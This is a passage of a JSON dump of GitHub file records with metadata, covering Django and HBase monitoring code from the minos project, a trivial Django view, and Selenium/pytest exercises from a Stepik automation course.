name=package_name,\n ).order_by('id').reverse()\n else:\n package_list = Package.objects.filter(\n artifact=artifact,\n ).order_by('id').reverse()\n\n if len(package_list) > 0:\n return package_list[0]\n else:\n return None\n\ndef get_package(artifact, checksum):\n package_list = Package.objects.filter(\n artifact=artifact,\n checksum=checksum,\n )\n\n if len(package_list) > 0:\n return package_list[0]\n else:\n return None\n\n"
},
{
"alpha_fraction": 0.6201550364494324,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 31.25,
"blob_id": "538b01a4bc18cb72812ff9227be713b2f4fdf68c",
"content_id": "876689e1c15727ab9834d32811fad1a84f28d9d5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 129,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 4,
"path": "/owl/alert.sh",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n# add emails(',' seperated) that need to alert \npython2.7 manage.py alert --to_email=\"\" --period=30 >alert.log 2>&1\n"
},
{
"alpha_fraction": 0.7016885280609131,
"alphanum_fraction": 0.7242026329040527,
"avg_line_length": 24.380952835083008,
"blob_id": "5cc075e5e161f0ec6efad079c17889ee9deeab79",
"content_id": "6d97f4e93fb8758d59ce3110d6f4fec2fe82da5b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 533,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 21,
"path": "/opentsdb/README.md",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# Opentsdb metrics collector\n[Opentsdb](http://opentsdb.net) is used to store and display metrics of clusters.\n\n# Installation\nSetup opentsdb\n<http://opentsdb.net/getting-started.html>\n\nConfigure for metrics collector\n\nModify file in config/opentsdb/metrics_collector_config.py\n\n # metrics's output url in owl\n metrics_url = 'http://127.0.0.1:8000/monitor/metrics'\n # opentsdb's binary path\n opentsdb_bin_path = 'tsdb'\n # perfiod of collecting data in second\n collect_period = 10\n\n# Run\n\n nohup ./collector.sh &\n"
},
{
"alpha_fraction": 0.6160092949867249,
"alphanum_fraction": 0.6223897933959961,
"avg_line_length": 28.220338821411133,
"blob_id": "57f9ca571287601b06e5ca47b786431cccfb27e5",
"content_id": "5e13aa40a06c352ad7086cefac4be0246f3405c5",
"detected_licenses": [
"HPND",
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1724,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 59,
"path": "/supervisor/supervisor/medusa/virtual_handler.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Python -*-\n\nimport socket\nimport default_handler\nimport re\n\nHOST = re.compile ('Host: ([^:/]+).*', re.IGNORECASE)\n\nget_header = default_handler.get_header\n\nclass virtual_handler:\n\n \"\"\"HTTP request handler for an HTTP/1.0-style virtual host. Each\n Virtual host must have a different IP\"\"\"\n\n def __init__ (self, handler, hostname):\n self.handler = handler\n self.hostname = hostname\n try:\n self.ip = socket.gethostbyname (hostname)\n except socket.error:\n raise ValueError, \"Virtual Hostname %s does not appear to be registered in the DNS\" % hostname\n\n def match (self, request):\n if (request.channel.addr[0] == self.ip):\n return 1\n else:\n return 0\n\n def handle_request (self, request):\n return self.handler.handle_request (request)\n\n def __repr__ (self):\n return '<virtual request handler for %s>' % self.hostname\n\n\nclass virtual_handler_with_host:\n\n \"\"\"HTTP request handler for HTTP/1.1-style virtual hosts. This\n matches by checking the value of the 'Host' header in the request.\n You actually don't _have_ to support HTTP/1.1 to use this, since\n many browsers now send the 'Host' header. This is a Good Thing.\"\"\"\n\n def __init__ (self, handler, hostname):\n self.handler = handler\n self.hostname = hostname\n\n def match (self, request):\n host = get_header (HOST, request.header)\n if host == self.hostname:\n return 1\n else:\n return 0\n\n def handle_request (self, request):\n return self.handler.handle_request (request)\n\n def __repr__ (self):\n return '<virtual request handler for %s>' % self.hostname\n"
},
{
"alpha_fraction": 0.6808029413223267,
"alphanum_fraction": 0.6899443864822388,
"avg_line_length": 37.585453033447266,
"blob_id": "b53fbab3f398b1151d69d61878f14ec50e6f221b",
"content_id": "02f6f1dec747b5a9f914ee2d2f4efb58cd63220f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10611,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 275,
"path": "/owl/monitor/metric_helper.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport dbutil\nimport json\nimport metric_view_config\n\n# define operation metric suffix\nOPERATION_HISTOGRAM_75th_TIME = 'histogram_75th_percentile'\nOPERATION_HISTOGRAM_95th_TIME = 'histogram_95th_percentile'\nOPERATION_HISTOGRAM_99th_TIME = 'histogram_99th_percentile'\nOPERATION_HISTOGRAM_999th_TIME = 'histogram_999th_percentile'\nOPERATION_HISTOGRAM_PERCENTILES = [OPERATION_HISTOGRAM_75th_TIME,\n OPERATION_HISTOGRAM_95th_TIME,\n OPERATION_HISTOGRAM_99th_TIME,\n OPERATION_HISTOGRAM_999th_TIME]\n\ndef form_perf_counter_endpoint_name(task):\n delimiter = '-'\n endpoint_name = delimiter.join((task.host, str(task.port)))\n return endpoint_name\n\ndef form_perf_counter_group_name(task, bean_name):\n return parse_bean_name(bean_name)[0]\n\ndef form_percentile_counter_name(endpoint, group, operationName):\n percentiles = []\n for suffix in OPERATION_HISTOGRAM_PERCENTILES:\n percentiles.append(make_latency_metric_query(endpoint, group, '%s_%s' % (operationName, suffix)))\n return percentiles\n\n# parse bean name\n# return (service, name)\n# eg:\n# input 'hadoop:service=HBase,name=RPCStatistics-18600'\n# return ('HBase', 'RPCStatistics-18600')\ndef parse_bean_name(bean_name):\n items= bean_name.split(':')[1].split(',')[:2]\n return [item.split('=')[1] for item in items]\n\n# input:\n# 'ReplicationSource for 5-10.0.4.172%2C11600%2C1364508024855'\n# return 5-bak\n# input:\n# 'ReplicationSource for 5'\n# return 5\ndef parse_replication_source(name):\n fields = name.split('-')\n source_name = fields[0]\n try:\n source_num = source_name.split(' ')[2]\n if len(fields) > 1:\n return source_num + '-bak'\n else:\n return source_num\n except:\n return source_name\n\ndef form_perf_counter_key_name(bean_name, metric_name):\n # illegal perf counter char '~' exsit in hbase table metric.\n # replace it with '-'\n # eg:tbl.miliao_summary.cf.S~T.multiput_AvgTime\n # to tbl.miliao_summary.cf.S-T.multiput_AvgTime\n service, name = parse_bean_name(bean_name)\n if service == 'Replication':\n replication_src = parse_replication_source(name)\n metric_name += '-' + replication_src\n return metric_name.replace('~', '-')\n\ndef task_metrics_view_config(task):\n result = {}\n service, cluster, job, task = str(task).split('/')\n return metric_view_config.TASK_METRICS_VIEW_CONFIG[service][job]\n\ndef job_metrics_view_config(job):\n result = {}\n service, cluster, job = str(job).split('/')\n return metric_view_config.JOB_METRICS_VIEW_CONFIG[service][job]\n\ndef get_all_metrics_config():\n inputs = (metric_view_config.JOB_METRICS_VIEW_CONFIG,\n metric_view_config.TASK_METRICS_VIEW_CONFIG,\n )\n\n metric_set = set()\n\n for input in inputs:\n for job_name, tasks in input.iteritems():\n for task, task_configs in tasks.iteritems():\n for view, view_config in task_configs:\n for graph in view_config:\n for metric in graph:\n metric_set.add(metric)\n\n return list(metric_set)\n\ndef tsdb_task_metrics_view_config(task):\n result = {}\n service, cluster, job, task = str(task).split('/')\n return metric_view_config.TASK_METRICS_VIEW_CONFIG[service][job]\n\ndef tsdb_job_metrics_view_config(job):\n result = {}\n service, cluster, job = str(job).split('/')\n return metric_view_config.JOB_METRICS_VIEW_CONFIG[service][job]\n\ndef make_metric_query(endpoint, group, key, unit=\"\"):\n if unit:\n return \"&m=sum:%s{host=%s,group=%s}&o=&yformat=%%25.0s%%25c %s\" % (key, endpoint, group, unit)\n else:\n return \"&m=sum:%s{host=%s,group=%s}&o=\" % (key, endpoint, group)\n\ndef make_quota_query(cluster_name, user_id, key):\n return \"&m=sum:%s{cluster=%s,user_id=%s}&o=\" % (key, cluster_name, user_id)\n\ndef make_metrics_query_for_task(endpoint, task):\n metrics = []\n task_view_config = task_metrics_view_config(task)\n for view_tag, view_config in task_view_config:\n metrics_view = []\n for graph_config in view_config:\n group, key, unit = graph_config[0]\n graph = {\n 'title' : '%s:%s' % (group, key),\n 'query' : make_metric_query(endpoint, group, key, unit),\n }\n metrics_view.append(graph)\n metrics.append((view_tag, metrics_view))\n return metrics\n\ndef make_metrics_query_for_job(endpoints, job, tasks):\n metrics = []\n task_view_config = job_metrics_view_config(job)\n for view_tag, view_config in task_view_config:\n metrics_view = []\n for graph_config in view_config:\n group, key, unit = graph_config[0]\n metrics_view.append(make_metric_query_graph_for_endpoints(endpoints, group, key, unit))\n metrics.append((view_tag, metrics_view))\n return metrics\n\ndef make_metric_query_graph_for_endpoints(endpoints, group, key, unit=\"\"):\n graph = {\n 'title' : '%s:%s' % (group, key),\n 'query' : [],\n }\n for endpoint in endpoints:\n graph['query'].append(make_metric_query(endpoint, group, key, unit))\n return graph\n\ndef get_peer_id_endpoint_map_and_cluster(region_servers):\n peer_id_endpoint_map = {}\n peer_id_cluster = {}\n for region_server in region_servers:\n endpoint = form_perf_counter_endpoint_name(region_server.task)\n replicationMetrics = json.loads(region_server.replicationMetrics)\n for peer_id in replicationMetrics.keys():\n if \"peerClusterName\" in replicationMetrics[peer_id]:\n peer_id_cluster[peer_id] = replicationMetrics[peer_id][\"peerClusterName\"]\n peer_id_endpoints = peer_id_endpoint_map.setdefault(peer_id, []) \n peer_id_endpoints.append(endpoint)\n return (peer_id_endpoint_map, peer_id_cluster)\n\ndef make_metrics_query_for_replication(peer_id_endpoint_map, peer_id_cluster_map):\n metrics = []\n for peer_id in peer_id_endpoint_map.keys():\n endpoints = peer_id_endpoint_map[peer_id]\n peer_graphs = []\n for key_and_unit in metric_view_config.REPLICATION_METRICS_VIEW_CONFIG:\n key = key_and_unit[0]\n unit = key_and_unit[1]\n replication_key = key + '-' + peer_id\n peer_graphs.append(make_metric_query_graph_for_endpoints(endpoints, \"Replication\", replication_key, unit))\n cluster_name = \"unknown-cluster\"\n if peer_id in peer_id_cluster_map.keys():\n cluster_name = peer_id_cluster_map[peer_id]\n metrics.append((peer_id, cluster_name, peer_graphs))\n return metrics\n\ndef make_ops_metric_query(endpoint, group, name):\n return make_metric_query(endpoint, group, name, metric_view_config.DEFAULT_OPS_UNIT)\n\ndef make_latency_metric_query(endpoint, group, name):\n return make_metric_query(endpoint, group, name, metric_view_config.DEFAULT_LATENCY_UNIT)\n\n# metrics is an array of counters, where the counter is formatted as :\n# [operationName, CounterOfNumOps, CounterOfAvgTime]\ndef make_operation_metrics(endpoint, record, group):\n metrics = []\n if record.operationMetrics is not None and record.operationMetrics != '':\n operationMetrics = json.loads(record.operationMetrics)\n for operationName in operationMetrics.keys():\n # remove common prefix for 'coprocessor-operation'\n tokens = operationName.split('-')\n operationShowName = tokens[len(tokens) - 1]\n operationCounter = []\n operationCounter.append(operationShowName)\n\n operationNumOpsName = operationName + '_NumOps'\n numOpsCounter = {}\n numOpsCounter['title'] = operationNumOpsName\n numOpsCounter['query'] = []\n numOpsCounter['query'].append(make_ops_metric_query(endpoint, group, operationNumOpsName))\n operationCounter.append(numOpsCounter)\n\n operationAvgTimeName = operationName + '_AvgTime'\n avgTimeCounter = {}\n avgTimeCounter['title'] = operationAvgTimeName\n avgTimeCounter['query'] = []\n avgTimeCounter['query'].append(make_latency_metric_query(endpoint, group, operationAvgTimeName))\n operationCounter.append(avgTimeCounter)\n\n metrics.append(operationCounter)\n return metrics\n\n# [op_name: [{op_num: [table1_op1_avg_query, table2_op1_avg_query]},\n# {op_avg: [table2 op1_ops, table2 op1_num]}],\n# ]\ndef make_operation_metrics_for_tables_in_cluster(cluster):\n # we first read operation metrics for tables of the cluster\n tables = dbutil.get_table_by_cluster(cluster)\n clusterOperationMetrics = json.loads(cluster.hbasecluster.operationMetrics)\n operationCounterNameOfTables = {}\n metrics = {}\n for operationName in clusterOperationMetrics.keys():\n tokens = operationName.split('-')\n operationShowName = tokens[-1]\n numOpsCounterName = '%s_NumOps' % (operationShowName)\n avgTimeCounterName = '%s_AvgTime' % (operationShowName)\n metrics[operationShowName] = [{'title': numOpsCounterName, 'query': []},\n {'title': avgTimeCounterName, 'query': []}] # reserved for num and avg graph\n\n for table in tables:\n if table.operationMetrics is not None and table.operationMetrics != '':\n tableOperationMetrics = json.loads(table.operationMetrics)\n endpoint = cluster.name\n group = table.name\n for operationName in tableOperationMetrics:\n if operationName not in metrics.keys():\n continue\n numOpsCounterName = '%s_NumOps' % (operationName)\n avgTimeCounterName = '%s_AvgTime' % (operationName)\n print type(endpoint)\n print type(group)\n print type(numOpsCounterName)\n metrics[operationName][0]['query'].append(make_ops_metric_query(endpoint, group, numOpsCounterName))\n metrics[operationName][1]['query'].append(make_latency_metric_query(endpoint, group, avgTimeCounterName))\n\n return metrics\n\n# metric is an array of counters, where counter is formatted as:\n# [operationName, CounterOfNumOps, CountersOfPercentile]\ndef generate_operation_metric_for_regionserver(regionserver):\n task = regionserver.task\n metric = []\n endpoint = form_perf_counter_endpoint_name(regionserver.task)\n group = 'HBase'\n for operationName in metric_view_config.REGION_SERVER_OPERATION_VIEW_CONFIG:\n counter = []\n # first append operationName\n counter.append(operationName)\n # then, append counter for NumOps\n num_ops_counter = {}\n num_ops_counter['title'] = operationName + '_histogram_num_ops'\n num_ops_counter['query'] = []\n num_ops_counter['query'].append(make_ops_metric_query(endpoint, group, num_ops_counter['title']))\n counter.append(num_ops_counter)\n\n # lastly, append counters for percentile\n percentile_counter = {}\n percentile_counter['title'] = 'Percentile-Comparision'\n percentile_counter['query'] = form_percentile_counter_name(endpoint, group, operationName)\n counter.append(percentile_counter)\n\n metric.append(counter)\n return metric\n"
},
{
"alpha_fraction": 0.6733333468437195,
"alphanum_fraction": 0.6866666674613953,
"avg_line_length": 24,
"blob_id": "b824f581385df8f30d00f148eeedf0a2a35629f3",
"content_id": "c15c7cf6e2886b35d2f432ab78a73f47b0090e30",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 150,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 6,
"path": "/client/deploy",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nsource \"$(dirname $0)\"/../build/minos_env.sh || exit 1\ncd $CLIENT_ROOT\n\nPYTHONPATH=$CLIENT_ROOT exec $ENV_PYTHON $CLIENT_DEPLOY_ENTRY $@\n"
},
{
"alpha_fraction": 0.43023255467414856,
"alphanum_fraction": 0.7093023061752319,
"avg_line_length": 16.200000762939453,
"blob_id": "8f3b483ce7c662abcbe68c8519598003a8f0604c",
"content_id": "495a0117d699a3d8e9a581c1dd57cbdcca054e2d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 86,
"license_type": "permissive",
"max_line_length": 27,
"num_lines": 5,
"path": "/build/virtual_bootstrap/virtualenv_support/requirements.txt",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "configobj>=4.7.2\ndjango>=1.5.5\nmeld3>=0.6.10\nelementtree>=1.2.6-20050316\npexpect>=3.0\n"
}
] | 161 |
Tomeu7/UPC-MAI-DL.github.io | https://github.com/Tomeu7/UPC-MAI-DL.github.io | b82099914f2c8344d566591f578577616e69237a | ee43ae6dce766b6a4c6ec017982a2384d19d90db | f9c2bbe0bc77c4703116095624ae1569b0cfbb05 | refs/heads/master | 2021-01-25T11:39:25.757953 | 2018-03-01T09:43:46 | 2018-03-01T09:43:46 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5804222822189331,
"alphanum_fraction": 0.5940499305725098,
"avg_line_length": 29.121387481689453,
"blob_id": "4764ae8c3d70f4f950f5f8268ee5ea15a540a1ff",
"content_id": "2f8c763b2d16f9a2df077b679ce8fe0a049cae22",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5210,
"license_type": "permissive",
"max_line_length": 126,
"num_lines": 173,
"path": "/_codes/2.RNN/Wind/WindPrediction.py",
"repo_name": "Tomeu7/UPC-MAI-DL.github.io",
"src_encoding": "UTF-8",
"text": "\"\"\"\n.. module:: WindPrediction\n\nWindPrediction\n*************\n\n:Description: WindPrediction\n\n:Authors: bejar\n \n\n:Version: \n\n:Created on: 06/09/2017 9:47 \n\n\"\"\"\n\nimport numpy as np\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation\nfrom keras.layers import LSTM, GRU\nfrom keras.optimizers import RMSprop, SGD\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.metrics import mean_squared_error\nimport argparse\nimport json\nimport time\n\n__author__ = 'bejar'\n\ndef lagged_vector(data, lag=1):\n \"\"\"\n Returns a matrix with columns that are the steps of the lagged time series\n Last column is the value to predict\n :param data:\n :param lag:\n :return:\n \"\"\"\n lvect = []\n for i in range(lag):\n lvect.append(data[i: -lag+i])\n lvect.append(data[lag:])\n return np.stack(lvect, axis=1)\n\ndef load_config_file(nfile, abspath=False):\n \"\"\"\n Read the configuration from a json file\n\n :param abspath:\n :param nfile:\n :return:\n \"\"\"\n ext = '.json' if 'json' not in nfile else ''\n pre = '' if abspath else './'\n fp = open(pre + nfile + ext, 'r')\n\n s = ''\n\n for l in fp:\n s += l\n\n return json.loads(s)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--config', default='config', help='Experiment configuration')\n parser.add_argument('--verbose', help=\"Verbose output (enables Keras verbose output)\", action='store_true', default=False)\n parser.add_argument('--gpu', help=\"Use LSTM/GRU gru implementation\", action='store_true', default=False)\n args = parser.parse_args()\n\n verbose = 1 if args.verbose else 0\n impl = 2 if args.gpu else 0\n\n config = load_config_file(args.config)\n\n print(\"Starting:\", time.ctime())\n\n ###########################################\n # Data\n\n vars = {0: 'wind_speed', 1: 'air_density', 2: 'temperature', 3: 'pressure'}\n\n wind = np.load('Wind.npz')\n print(wind.files)\n wind = wind['90-45142']\n wind = wind[:, 0]\n\n scaler = StandardScaler()\n wind = scaler.fit_transform(wind.reshape(-1, 1))\n\n # Size of the training and size for validatio+test set (half for validation, half for test)\n datasize = config['datasize']\n testsize = config['testsize']\n\n # Length of the lag for the training window\n lag = config['lag']\n\n wind_train = wind[:datasize, 0]\n train = lagged_vector(wind_train, lag=lag)\n train_x, train_y = train[:, :-1], train[:,-1]\n train_x = np.reshape(train_x, (train_x.shape[0], train_x.shape[1], 1))\n\n wind_test = wind[datasize:datasize+testsize, 0]\n test = lagged_vector(wind_test, lag=lag)\n half_test = int(test.shape[0]/2)\n\n val_x, val_y = test[:half_test, :-1], test[:half_test,-1]\n val_x = np.reshape(val_x, (val_x.shape[0], val_x.shape[1], 1))\n\n test_x, test_y = test[half_test:, :-1], test[half_test:,-1]\n test_x = np.reshape(test_x, (test_x.shape[0], test_x.shape[1], 1))\n\n ############################################\n # Model\n\n neurons = config['neurons']\n drop = config['drop']\n nlayers = config['nlayers']\n RNN = LSTM if config['rnn'] == 'LSTM' else GRU\n\n activation = config['activation']\n activation_r = config['activation_r']\n\n model = Sequential()\n if nlayers == 1:\n model.add(RNN(neurons, input_shape=(train_x.shape[1], 1), implementation=impl, dropout=drop,\n activation=activation, recurrent_activation=activation_r))\n else:\n model.add(RNN(neurons, input_shape=(train_x.shape[1], 1), implementation=impl, dropout=drop,\n activation=activation, recurrent_activation=activation_r, return_sequences=True))\n for i in range(1, nlayers-1):\n model.add(RNN(neurons, dropout=drop, implementation=impl,\n activation=activation, recurrent_activation=activation_r, return_sequences=True))\n model.add(RNN(neurons, dropout=drop, implementation=impl,\n activation=activation, recurrent_activation=activation_r))\n model.add(Dense(1))\n\n print('lag: ', lag, 'Neurons: ', neurons, 'Layers: ', nlayers, activation, activation_r)\n print()\n\n ############################################\n # Training\n\n optimizer = RMSprop(lr=0.0001)\n model.compile(loss='mean_squared_error', optimizer=optimizer)\n\n batch_size = config['batch']\n nepochs = config['epochs']\n\n model.fit(train_x, train_y,\n batch_size=batch_size,\n epochs=nepochs,\n verbose=verbose, validation_data=(val_x, val_y))\n\n ############################################\n # Results\n\n print()\n score = model.evaluate(val_x, val_y,\n batch_size=batch_size,\n verbose=0)\n print('MSE Val= ', score)\n print ('MSE Val persistence =', mean_squared_error(val_y[1:], val_y[0:-1]))\n\n score = model.evaluate(test_x, test_y,\n batch_size=batch_size,\n verbose=0)\n print('MSE Test= ', score)\n print ('MSE Test persistence =', mean_squared_error(test_y[1:], test_y[0:-1]))\n print()\n print(\"Ending:\", time.ctime())"
}
] | 1 |
ldoney/AnnoyingBot | https://github.com/ldoney/AnnoyingBot | 9f2a4b908993d9951bdb1c6abeeada7cbfc8179b | e0d6fb9562cccd9b40a14ff84da2fff55cd3c589 | 7a2582eccfa4a26f6a8d582507fa53d9403af79c | refs/heads/master | 2020-04-22T02:18:54.013272 | 2019-02-11T00:36:32 | 2019-02-11T00:36:32 | 170,044,209 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7129629850387573,
"alphanum_fraction": 0.7268518805503845,
"avg_line_length": 18.545454025268555,
"blob_id": "b5e08baa09c3e9512faea4114e868a4ff8adab33",
"content_id": "9e84b0c9a07bd8eb8293272c5be5b5a23f3ae2cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 216,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 11,
"path": "/tts",
"repo_name": "ldoney/AnnoyingBot",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n#The FILL part is just because it has a slight delay\n#Also, this needs pico2wave\npico2wave -w=/tmp/test.wav \"FILL $1\"\n\n#Plays the sound it made\naplay /tmp/test.wav\n\n#Deletes said sound\nrm /tmp/test.wav\n\n"
},
{
"alpha_fraction": 0.6908783912658691,
"alphanum_fraction": 0.7060810923576355,
"avg_line_length": 28.600000381469727,
"blob_id": "3fe73a3aa41e36731a91b667a40d023af32f82c3",
"content_id": "afe12eff1604f94521ec4585129b34768036c359",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1184,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 40,
"path": "/webcam.py",
"repo_name": "ldoney/AnnoyingBot",
"src_encoding": "UTF-8",
"text": "import cv2\nimport numpy as np\nimport os\nimport time\nimport random\n\n#Replace this with your opencv directory for the cascades and stuff\nface_cascade = cv2.CascadeClassifier('/home/pi/opencv-3.4.0/data/haarcascades/haarcascade_frontalface_default.xml')\n\n#Initializes the webcam capture\ncap = cv2.VideoCapture(0)\n\n#All of the things this motherfucker can say (You can add more if youd like)\ntexts = [\"Hi\", \"Notice me\", \"lalalala\", \"Hello\"]\n\n#Infinite loop because I hate myself\nwhile True:\n #Get what the Camera can see\n ret, img = cap.read()\n\n #Make it grey because reasons\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n #Gets the faces in the thingy\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n\n #Checks to see if there's any faces\n if len(faces) > 0:\n\t #Uses the tts script and chooses some random word to say to annoy you\n\t os.system(\"./tts \\'\" + texts[random.randint(1, len(texts) - 1)] + \"\\'\")\n\n #Prints out how many faces it sees (You can get rid of this if you want to)\n print(len(faces))\n\n #Sleeps for a second so it doesnt destroy the CPU\n time.sleep(1)\n\n#And this is just cleanup stuff\ncap.release()\ncv2.destroyAllWindows()\n"
}
] | 2 |
japsimransingh/django | https://github.com/japsimransingh/django | d7562344242a837edf3f59808cfc2a2c3e8032cb | 2e0804b46838b2d46a5f52faf9bc61191b266aaf | ce890d7e64a052de175542da8371bbbb774d1f36 | refs/heads/master | 2021-05-14T02:02:59.735590 | 2019-12-23T06:20:19 | 2019-12-23T06:20:19 | 116,584,989 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7118644118309021,
"alphanum_fraction": 0.7288135886192322,
"avg_line_length": 28.5,
"blob_id": "37721efe70d8b7f32c8e4875be428b7d8d1b7d10",
"content_id": "4efe5ba358999e0e2ccd16308712ab5436126a56",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 118,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 4,
"path": "/pages/views.py",
"repo_name": "japsimransingh/django",
"src_encoding": "UTF-8",
"text": "from django.http import HttpResponse\n\ndef homepage(request):\n return HttpResponse(\"<h1> this is 'home page'</h1>\")\n"
}
] | 1 |
Bugaga159/stepik-test | https://github.com/Bugaga159/stepik-test | 4fd4fcc8fda1d4bc41e1cc53541833ad9bb6c655 | dfbe4275d299915db35220f2f79368d1fd0b763a | 6c2d7d77e954288e28d4e7afcd2b5c7f90ff334d | refs/heads/master | 2020-09-05T17:04:24.098814 | 2019-11-10T21:01:30 | 2019-11-10T21:01:30 | 220,164,070 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8051391839981079,
"alphanum_fraction": 0.835117757320404,
"avg_line_length": 37.91666793823242,
"blob_id": "602876ea0ae70744e00984ddec25f52c369110b7",
"content_id": "b3c946ca751a5b24218e6595d4924eb761663d9b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 765,
"license_type": "no_license",
"max_line_length": 243,
"num_lines": 12,
"path": "/README.md",
"repo_name": "Bugaga159/stepik-test",
"src_encoding": "UTF-8",
"text": "Автоматизация тестирования с помощью Selenium и Python\nАвтоматизация тестирования с помощью Selenium и Python\n\nСсылка на курс: https://stepik.org/575\n\nОписание:\nВ репозитории задачи из базового курса для начинающих тестировщиков: автоматизированные UI-тесты на языке программирования Python с помощью библиотеки Selenium. Также использованы популярные фреймворки и хорошие практики написания авто-тестов.\n\nЧто используется:\nPython 3.7.3\nSelenium 3.13.0\nPyTest 3.10.1\n"
},
{
"alpha_fraction": 0.6097561120986938,
"alphanum_fraction": 0.6550522446632385,
"avg_line_length": 26.33333396911621,
"blob_id": "80c7ced7c1f81eda89d40c4e4e90ac8993c21dcf",
"content_id": "f6aa2c184c8d4b8a193847ac94f9eaaeaa419e68",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1160,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 42,
"path": "/test_lesson_3_6.py",
"repo_name": "Bugaga159/stepik-test",
"src_encoding": "UTF-8",
"text": "import time\nimport math\nfrom selenium import webdriver\nimport pytest\n\[email protected](scope=\"function\")\ndef browser():\n print(\"\\nstart browser for test..\")\n browser = webdriver.Chrome()\n yield browser\n print(\"\\nquit browser..\")\n browser.quit()\n\n\ndef answer():\n return math.log(int(time.time()))\n\nnumberArr = ['236895', '236896', '236897', '236898', '236899', '236903', '236904', '236905']\ntextError = []\[email protected]('number', numberArr)\ndef test_ansver_take(browser, number):\n link = f\"https://stepik.org/lesson/{number}/step/1\"\n browser.get(link)\n browser.implicitly_wait(5)\n\n textBtn1 = browser.find_element_by_css_selector('textarea')\n\n print(answer())\n textBtn1.send_keys(str(answer()))\n\n button = browser.find_element_by_xpath('//*/button[@class=\"submit-submission\"]')\n\n button.click()\n textOutput = browser.find_element_by_xpath('//*/pre[@class=\"smart-hints__hint\"]').text\n\n if textOutput != 'Correct!':\n textError.append(textOutput)\n print(\"\".join(textError))\n assert False, f'Не прошел тест - {number}'\n else:\n print(textError)\n assert True\n"
},
{
"alpha_fraction": 0.6928446888923645,
"alphanum_fraction": 0.7033158540725708,
"avg_line_length": 39.92856979370117,
"blob_id": "a4b8d6c66d2f925b8f3b90887df42a0df9ca3288",
"content_id": "4837e5798e6dc0890dd1d2adddc8d20ce48abb05",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 612,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 14,
"path": "/test_items.py",
"repo_name": "Bugaga159/stepik-test",
"src_encoding": "UTF-8",
"text": "from selenium.common.exceptions import NoSuchElementException\nimport time\n\ndef test_guest_should_see_button_add_to_basket(browser):\n link = \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/\"\n browser.get(link)\n #Если нужно проверить визуально, снять коммит с time\n time.sleep(30)\n try:\n btn_add = browser.find_element_by_xpath('//*[@id=\"add_to_basket_form\"]/button[@class=\"btn btn-lg btn-primary btn-add-to-basket\"]')\n assert btn_add\n except NoSuchElementException:\n print('Button not found!')\n assert False\n"
}
] | 3 |
AkshayBhansali18/CNN | https://github.com/AkshayBhansali18/CNN | eefc9edecd2fb287e29e7a5a89b0299b9ae15d22 | 8efa53c28663d35812d5d2246d59d7d87275fbfa | 8143b0a9eb5a2dc50206d5d0ee528ea4d5b23e87 | refs/heads/master | 2020-06-21T20:42:24.318060 | 2019-07-18T08:42:29 | 2019-07-18T08:42:29 | 197,547,821 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6899307370185852,
"alphanum_fraction": 0.7256259918212891,
"avg_line_length": 38.8510627746582,
"blob_id": "aa6ea954b2dfd46ce5cdf0c78f3ce00c3dc22460",
"content_id": "fdd5f5bc0b570dab6c0cd8d0a23f48e3f6c4e0ee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1877,
"license_type": "no_license",
"max_line_length": 241,
"num_lines": 47,
"path": "/asfkl.py",
"repo_name": "AkshayBhansali18/CNN",
